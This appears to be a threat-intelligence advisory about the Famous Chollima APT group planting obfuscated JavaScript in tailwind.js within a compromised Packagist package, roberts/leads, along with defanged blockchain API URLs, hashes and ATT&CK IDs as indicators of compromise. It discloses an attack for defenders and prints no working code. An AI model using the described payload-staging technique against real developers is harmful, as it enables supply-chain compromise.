Famous Chollima Targets PHP Developers Through Compromised Packagist Package
Famous Chollima APT targets PHP developers via compromised Packagist package with malicious JavaScript in tailwind.js.
Summary
The Famous Chollima APT group is targeting PHP developers through a compromised Packagist package. The malicious code, found in a development version of the `roberts/leads` package, injects obfuscated JavaScript into `tailwind.js` to retrieve and execute encrypted payloads from blockchain infrastructure. This campaign may be part of a fake job interview or developer-task lure.
Full text
Research/Security NewsMalicious NuGet Package Impersonates Sicoob SDK to Exfiltrate Banking Certificates and PasswordsA malicious NuGet package impersonating Sicoob exfiltrated client IDs, PFX passwords, and banking certificates through Sentry telemetry. By Kirill Boychenko - May 28, 2026
Indicators of Compromise
- url — hxxps://api[.]trongrid[.]io/v1/accounts/TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP/transactions?only_confirmed=true&only_from=true&limit=1
- url — hxxps://fullnode[.]mainnet[.]aptoslabs[.]com/v1/accounts/0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e/transactions?limit=1
- hash_sha256 — 522b28a2f78771715497ba53729d4ab9a50e982322c391379f3bddf7c8cb363f
- hash_sha256 — 96afdba882046385242cbed46871e41147c8055c5d9eff7460847b2c01a77dc3
- domain — trongrid.io
- domain — aptoslabs.com
- mitre_attack — T1195.002
- mitre_attack — T1204.002
- mitre_attack — T1059.007
- mitre_attack — T1027
- mitre_attack — T1102.001
- mitre_attack — T1105